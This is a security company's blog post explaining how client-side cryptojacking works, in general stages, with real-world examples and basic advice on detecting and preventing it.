Cryptojacking: What is it And What You Need to Know in 2023
Cyber Risks & Threats | May 11, 2023
It’s a bit like someone else borrowing your car to drive deliveries and earn money behind your back, using up your gas and leaving you with added wear and tear on your vehicle in the process.
The image above succinctly describes the process of a client-side cryptojacking attack, but to better understand this process, let’s take a closer look at the steps in the attack. For a more detailed breakdown of common cybersecurity attack techniques (and how to mitigate them), check out our recent blogs on Cyberattacks and the OSI model.
Step One: Finding an Injection Point
For starters, would-be attackers need to identify a target. To do this, hackers may employ automated scanning tools, such as vulnerability scanners or web application scanners, to quickly scan a large number of websites for common security issues like outdated software versions, misconfigurations, or known vulnerabilities in web applications. They may also target specific web application frameworks or popular plugins in a supply chain attack.
Step Two: Creating Malicious Code
Simply signing up for a mining pool and pasting a couple of lines of code into the source of a website is all it takes for an attacker to set up a shop.
And hackers aren’t limited when choosing how they are going to inject a miner into your website. In the course of our research, we found thousands of live samples, including cryptoloot, coinimp, jsecoin, crypto-webminer, cryptonoter, monerominer, deepminer, and coin-have.
Step Three: Code Injection
Step Four: Execution and Mining
It continuously solves cryptographic puzzles or algorithms to validate and confirm transactions on the cryptocurrency network. Once a miner successfully solves a puzzle, they create a new block and receive a reward in the form of cryptocurrency.
As the mining process progresses, the victim’s device experiences increased CPU or GPU usage, causing the system to work harder and generate additional heat. This can lead to device slowdowns, reduced battery life, and potential hardware damage in extreme cases.
While researching Cryptojacking, our laptops heated up, and fans kicked on. Cryptojacking not only degrades the performance of users’ computers but shortens the life of their computer’s components. For site owners, cryptojacking degrades page performance as well as user experience, ultimately driving visitors away from your site.
Step Five: Concealment and Persistence
To avoid detection, the attacker may use techniques like code obfuscation or periodically change the location of the injected script.
How prolific is cryptojacking?
In our research, we saw compromised websites as low as personal blogs up to top Alexa-ranked websites being affected by Cryptojacking. No single vulnerability is being exploited to compromise these websites but we are seeing an uptick in mining operations online.
One notable example is the faceXworm attack, which used social engineering techniques to trick users into downloading and installing a malicious browser extension, which gained access to the victim’s Facebook account and sent malicious messages to the victim’s friends, further spreading the infection.
Following the cryptocurrency crash of November 2022 and subsequent lowered cryptocurrency values, some attackers have turned to new techniques that target valuable cloud and server resources for cryptomining. Some attackers have begun exploiting free trials on some of the largest continuous integration and deployment (CI/CD) services to deploy code and create distributed mining platforms, while others are targeting misconfigured Kubernetes and Docker instances to gain access to the host systems and run cryptomining software.
Other attackers have turned to targeting server-side resources. ProxyShellMiner, for example, exploits three vulnerabilities in Microsoft Exchange servers to install a Monero miner on compromised machines.
What can you do to prevent cryptojacking?
So, what can you do about cryptojacking? The first step is to know the signs. Then, as you may guess, there are two different ways of mitigating its effects: detection and defense. Detecting cryptojacking isn’t always easy, but defense is even trickier.
The first thing to consider is whether or not your website is being cryptojacked. Here are some things to check:
- Are you getting HTTP requests for Bitcoin and Monero transactions on your site?
- Does your computer heat up and run the fan when you access your website?
If you’re concerned about cryptojacking on your business network, you could also use a network monitoring tool to look for unusual resource usage.
No matter how it’s done, mining cryptocurrency is a massive resource hog, which gives some telltale signs, such as abnormally high CPU or GPU usage. Especially in off-business hours when machines should be less active. A simple way to look for abnormal use would be to set up alerts for when CPU usage exceeds a certain threshold in off-hours or on machines that don’t typically perform CPU-intensive tasks.
For a site owner, things are a bit more difficult. In order to definitively prevent cryptojacking on your website, you need full visibility into the code running on your website, as well as any third-party connectors and plugins, and the ability to unilaterally block unwanted code.